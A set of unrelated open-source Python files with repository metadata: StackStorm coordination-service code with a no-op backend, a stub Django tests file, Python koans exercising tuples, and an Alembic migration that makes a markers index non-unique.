def watch_join_group(self, group_id, callback):
self._hooks_join_group[group_id].append(callback)
def unwatch_join_group(self, group_id, callback):
return None
def watch_leave_group(self, group_id, callback):
return None
def unwatch_leave_group(self, group_id, callback):
return None
def watch_elected_as_leader(self, group_id, callback):
return None
def unwatch_elected_as_leader(self, group_id, callback):
return None
@staticmethod
def stand_down_group_leader(group_id):
return None
@staticmethod
def create_group(group_id):
return None
@staticmethod
def get_groups():
return None
@staticmethod
def join_group(group_id, capabilities=''):
return None
@staticmethod
def leave_group(group_id):
return None
@staticmethod
def delete_group(group_id):
return None
@staticmethod
def get_members(group_id):
return None
@staticmethod
def get_member_capabilities(group_id, member_id):
return None
@staticmethod
def update_capabilities(group_id, capabilities):
return None
@staticmethod
def get_leader(group_id):
return None
@staticmethod
def get_lock(name):
return NoOpLock(name='noop')
def configured():
"""
Return True if the coordination service is properly configured.
:rtype: ``bool``
"""
backend_configured = cfg.CONF.coordination.url is not None
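    # 'zake' and 'file' URLs point at in-memory / local-only test backends, so they are
    # not treated as a real coordination backend here.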
mock_backend = backend_configured and (cfg.CONF.coordination.url.startswith('zake') or
cfg.CONF.coordination.url.startswith('file'))
return backend_configured and not mock_backend
def coordinator_setup():
"""
Sets up the client for the coordination service.
URL examples for connection:
zake://
file:///tmp
redis://username:password@host:port
mysql://username:password@host:port/dbname
"""
url = cfg.CONF.coordination.url
lock_timeout = cfg.CONF.coordination.lock_timeout
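    # Illustrative values only: in the st2 config these typically live in a [coordination]
    # section, e.g. url = redis://:password@127.0.0.1:6379 and lock_timeout = 60.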
proc_info = system_info.get_process_info()
member_id = '%s_%d' % (proc_info['hostname'], proc_info['pid'])
if url:
coordinator = coordination.get_coordinator(url, member_id, lock_timeout=lock_timeout)
else:
# Use a no-op backend
        # Note: We don't use tooz to obtain a reference to the driver since that would require
        # registering a plugin via a setup.py entry_point and running "python setup.py develop"
        # for the tests to work
coordinator = NoOpDriver(member_id)
coordinator.start()
return coordinator
def coordinator_teardown(coordinator):
coordinator.stop()
def get_coordinator():
global COORDINATOR
if not configured():
        LOG.warn('Coordination backend is not configured. Code paths which use the coordination '
                 'service will use a best-effort approach and race conditions are possible.')
if not COORDINATOR:
COORDINATOR = coordinator_setup()
return COORDINATOR
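# Minimal usage sketch (the lock name below is purely illustrative): callers share one
# coordinator and wrap critical sections in a distributed lock, which degrades to a
# NoOpLock when no backend is configured.
#
#   coordinator = get_coordinator()
#   with coordinator.get_lock('example-resource'):
#       pass  # critical section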
| {
"content_hash": "64b36b2e5e82dafc4ca55d2df37cf049",
"timestamp": "",
"source": "github",
"line_count": 164,
"max_line_length": 97,
"avg_line_length": 24.164634146341463,
"alnum_prop": 0.6482462780721675,
"repo_name": "tonybaloney/st2",
"id": "eb4c434f785ff981994fa6f8e67ac8cb38002713",
"size": "4743",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "st2common/st2common/services/coordination.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "198"
},
{
"name": "Makefile",
"bytes": "46066"
},
{
"name": "PowerShell",
"bytes": "299"
},
{
"name": "Python",
"bytes": "4278891"
},
{
"name": "Shell",
"bytes": "47687"
},
{
"name": "Slash",
"bytes": "677"
}
],
"symlink_target": ""
} |
from django.test import TestCase
from api import *
from pprint import pprint
# Create your tests here.
#pprint(get_certificate_count("CSE101", "2017", "IITB"))
#pprint(get_all_courses_certificate_count())
#pprint(get_certificate_students("AP101","2017","APIx"))
#pprint(get_all_courses_certificate_students()) | {
"content_hash": "7eaae6a96e4e4142e30c59c632e0ece6",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 56,
"avg_line_length": 31.1,
"alnum_prop": 0.7556270096463023,
"repo_name": "jaygoswami2303/course_dashboard_api",
"id": "380719721bd83b2bd9c1c5fdc17d7fd92f5b0f00",
"size": "311",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "v2/CourseAPI/tests.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "165924"
}
],
"symlink_target": ""
} |
from runner.koan import *
class AboutTuples(Koan):
def test_creating_a_tuple(self):
count_of_three = (1, 2, 5)
self.assertEqual(5, count_of_three[2])
def test_tuples_are_immutable_so_item_assignment_is_not_possible(self):
count_of_three = (1, 2, 5)
try:
count_of_three[2] = "three"
except TypeError as ex:
msg = ex.args[0]
# Note, assertRegexpMatches() uses regular expression pattern matching,
# so you don't have to copy the whole message.
self.assertRegexpMatches(msg, "'tuple' object.*")
def test_tuples_are_immutable_so_appending_is_not_possible(self):
count_of_three = (1, 2, 5)
with self.assertRaises(AttributeError): count_of_three.append("boom")
# Tuples are less flexible than lists, but faster.
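    # For instance, a tuple cannot be grown in place; you build a new tuple instead,
    # as the next test shows.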
def test_tuples_can_only_be_changed_through_replacement(self):
count_of_three = (1, 2, 5)
list_count = list(count_of_three)
list_count.append("boom")
count_of_three = tuple(list_count)
self.assertEqual((1, 2, 5, 'boom'), count_of_three)
def test_tuples_of_one_look_peculiar(self):
self.assertEqual(int, (1).__class__)
self.assertEqual(tuple, (1,).__class__)
self.assertEqual(("Hello comma!", ), ("Hello comma!", ))
def test_tuple_constructor_can_be_surprising(self):
self.assertEqual(('S', 'u', 'r', 'p', 'r', 'i', 's', 'e', '!'), tuple("Surprise!"))
def test_creating_empty_tuples(self):
self.assertEqual((), ())
self.assertEqual((), tuple()) #Sometimes less confusing
def test_tuples_can_be_embedded(self):
lat = (37, 14, 6, 'N')
lon = (115, 48, 40, 'W')
place = ('Area 51', lat, lon)
self.assertEqual(('Area 51', (37, 14, 6, 'N'), (115, 48, 40, 'W')), place)
def test_tuples_are_good_for_representing_records(self):
locations = [
("Illuminati HQ", (38, 52, 15.56, 'N'), (77, 3, 21.46, 'W')),
("Stargate B", (41, 10, 43.92, 'N'), (1, 49, 34.29, 'W')),
]
locations.append( ("Cthulu", (26, 40, 1, 'N'), (70, 45, 7, 'W')) )
self.assertEqual('Cthulu', locations[2][0])
self.assertEqual(15.56, locations[0][1][2])
| {
"content_hash": "97f382aa80cd78edd5d64b412337eb19",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 91,
"avg_line_length": 34.93846153846154,
"alnum_prop": 0.5689123734037869,
"repo_name": "ryanfitch/Python3_Koans_Solutions",
"id": "9a8fb3dfaa7298b64a4303baa19e69b80c0c0515",
"size": "2318",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python3/koans/about_tuples.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "816"
},
{
"name": "Python",
"bytes": "162992"
},
{
"name": "Shell",
"bytes": "44"
}
],
"symlink_target": ""
} |
"""remove constraint from markers: provider_and_id_idx_markers
Revision ID: 9d24fbb0f1fa
Revises: 3f07363021f6
Create Date: 2019-10-19 21:00:22.609457
"""
# revision identifiers, used by Alembic.
revision = '9d24fbb0f1fa'
down_revision = '3f07363021f6'
branch_labels = None
depends_on = None
from alembic import op
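# Applied in the usual Alembic way, e.g. "alembic upgrade head" (and reverted with
# "alembic downgrade -1"), assuming a configured Alembic environment.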
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index('provider_and_id_idx_markers', table_name='markers')
op.create_index('provider_and_id_idx_markers', 'markers', ['provider_and_id'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_index('provider_and_id_idx_markers', 'markers', ['provider_and_id'], unique=True)
# ### end Alembic commands ###
| {
"content_hash": "79c86351b919e0fefc40988647475a3e",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 96,
"avg_line_length": 29.321428571428573,
"alnum_prop": 0.6942752740560292,
"repo_name": "hasadna/anyway",
"id": "c8971a4a00e3b49db5df15bed9f17e9d815e005d",
"size": "821",
"binary": false,
"copies": "2",
"ref": "refs/heads/dev",
"path": "alembic/versions/9d24fbb0f1fa_remove_constraint_from_markers_provider_.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "34833"
},
{
"name": "Dockerfile",
"bytes": "2219"
},
{
"name": "HTML",
"bytes": "891295"
},
{
"name": "JavaScript",
"bytes": "392412"
},
{
"name": "Jupyter Notebook",
"bytes": "79628"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "PLpgSQL",
"bytes": "1980"
},
{
"name": "Procfile",
"bytes": "87"
},
{
"name": "Python",
"bytes": "1316356"
},
{
"name": "Shell",
"bytes": "5614"
}
],
"symlink_target": ""
} |